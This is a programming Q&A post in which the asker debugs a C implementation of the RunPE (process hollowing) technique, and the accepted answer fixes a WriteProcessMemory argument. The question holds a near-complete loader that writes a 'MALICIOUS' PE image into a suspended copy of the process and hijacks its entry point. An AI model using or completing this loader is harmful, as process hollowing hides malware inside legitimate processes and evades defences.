# Why I get 0xc00000005?

Tags: c, pe

I'm trying to use RunPE technique (For learning).

First, I tried it on Windows XP(32-bit) and no error occurs but, the injected code for(HelloWorld) didn't run.

Then, I tried to use it on Windows 7 and 10 (64-bit) and get this error[0xc00000005] when the thread resumed.
Why I get this error and why the injected code didn't run on the XP machine?

I tried also to unmap the imagebase(0x00400000) but I had the same problem.

my code:

```
int runPe(void* image) {

IMAGE_DOS_HEADER* dosHeader;
IMAGE_NT_HEADERS* ntHeader;
IMAGE_SECTION_HEADER* sectionHeader;
CONTEXT* ctx;

PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;


int i;
DWORD* ImageBase = NULL;
void* pImage = NULL;
char currentpath[1024];

GetModuleFileNameA(0, currentpath, 1024);       //path to the current exe

//Identifying the MALICIOUS IMAGE HEADERS
dosHeader = (PIMAGE_DOS_HEADER)(image);
ntHeader = (PIMAGE_NT_HEADERS)((DWORD)image + dosHeader->e_lfanew);

//Checks if this is a PE FILE
if (ntHeader->Signature == IMAGE_NT_SIGNATURE) {

    ZeroMemory(&pinfo, sizeof(pinfo));
    ZeroMemory(&sinfo, sizeof(sinfo));

    if (CreateProcessA(currentpath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &sinfo, &pinfo)) {
        printf("[*] Suspended process is created\n");
        Sleep(600);

        //Allocate memory for the context of suspended process
        ctx = (LPCONTEXT)(VirtualAlloc(NULL, sizeof(ctx), MEM_COMMIT, PAGE_READWRITE));
        if (ctx) {
            ctx->ContextFlags = CONTEXT_FULL;
            printf("[*] Context is allocated successfully\n");
            Sleep(600);
            
            //Get the thread context
            if (GetThreadContext(pinfo.hThread, (LPCONTEXT)ctx)) {
                printf("[*] Allocating MALICIOUS image headers into the suspended process\n");
                Sleep(600);

                ReadProcessMemory(pinfo.hProcess,(LPCVOID)(ctx->Ebx + 8), (LPVOID)(&ImageBase), 4, 0);

                pImage = VirtualAllocEx(pinfo.hProcess, NULL,
                    ntHeader->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

                if (pImage) {
                    printf("[*] Allocating memory for MALICIOUS image headers into the IMAGE_BASE\n");
                    Sleep(600);

                    //Writing the image intor the process address space
                    if (WriteProcessMemory(pinfo.hProcess, (LPVOID)pImage, image, ntHeader->OptionalHeader.SizeOfHeaders, NULL)) {
                        printf("[*] Writing memory for MALICIOUS image headers into the IMAGE_BASE\n");
                        Sleep(600);

                        //sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));
                        for (i = 0; i < ntHeader->FileHeader.NumberOfSections; i++)
                        {

                            sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + 248 + (i * sizeof(IMAGE_SECTION_HEADER)));
                            if (sectionHeader->SizeOfRawData == 00000000)
                                continue;

                            if (WriteProcessMemory(pinfo.hProcess, (LPVOID)((DWORD)(pImage) + sectionHeader->VirtualAddress),
                                (LPVOID)((DWORD)image + sectionHeader->PointerToRawData), sectionHeader->SizeOfRawData, 0))
                            {
                                printf("[*] Allocating memory for Section %d at %X\n", i, (LPVOID)((DWORD)pImage + sectionHeader->VirtualAddress));
                                Sleep(600);
                            }
                            else
                            {
                                printf("ERROR: Writing section (%d) into memory failed\n", i);
                                printf("Error Code: %d\n", GetLastError());
                                return -1;
                            }
                        }

                        //Change the imageBase address from the suspened process into the MALICIOUS
                        if (WriteProcessMemory(pinfo.hProcess, (LPVOID)(ctx->Ebx + 8), (LPVOID)(ntHeader->OptionalHeader.ImageBase), 4, 0)) {
                            printf("[*] Image base address is changed to MALICIOUS\n");
                            Sleep(600);

                            //Now we will move the address of entrypoint to the MALCIOUS image
                            // At EAX register
                            ctx->Eax = (DWORD)pImage + ntHeader->OptionalHeader.AddressOfEntryPoint;
                            printf("[*] AddressOfEntryPoint is changed to MALICIOUS\n");
                            Sleep(600);
                            
                            //Set Thread Context and resume it
                            SetThreadContext(pinfo.hProcess, (LPCONTEXT)ctx);
                            ResumeThread(pinfo.hThread);
                            printf("[*] Thread is resumed\n");
                        }

                        else
                        {
                            printf("ERROR: Change the imageBase address from the suspened process into the MALICIOUS failed\n");
                            printf("Error Code: %d\n", GetLastError());
                            return -1;
                        }
                    }
                    else
                    {
                        printf("ERROR: Writing the image into the process address space failed\n");
                        printf("Error Code: %d\n", GetLastError());
                        return -1;
                    }
        
                }
                else
                {
                    printf("ERROR: Allocating memory for MALICIOUS image headers into the IMAGE_BASE failed\n");
                    printf("Error Code: %d\n", GetLastError());
                    return -1;
                }
            }
            else
            {
                printf("ERROR: GetThreadContext failed\n");
                printf("Error Code: %d\n", GetLastError());
                return -1;
            }
        }
        else
        {
            printf("ERROR: Context allocation failed\n");
            printf("Error Code: %d\n", GetLastError());
            return -1;
        }
    }

    return 0;
}

else
{
    printf("ERROR: Invalid nt SIGNATURE\n");
    printf("Error Code: %d\n", GetLastError());
    return -1;
}
```

}

Answer (score 2, accepted):

SOLVED:

I must pass the address of the buffer not the value inside that buffer in WriteProcessMemmory
[Call by reference]

Modified:

```
WriteProcessMemory(pinfo.hProcess, (LPVOID)(ctx->Ebx + 8), (LPVOID)(&ntHeader->OptionalHeader.ImageBase), 4, 0)
```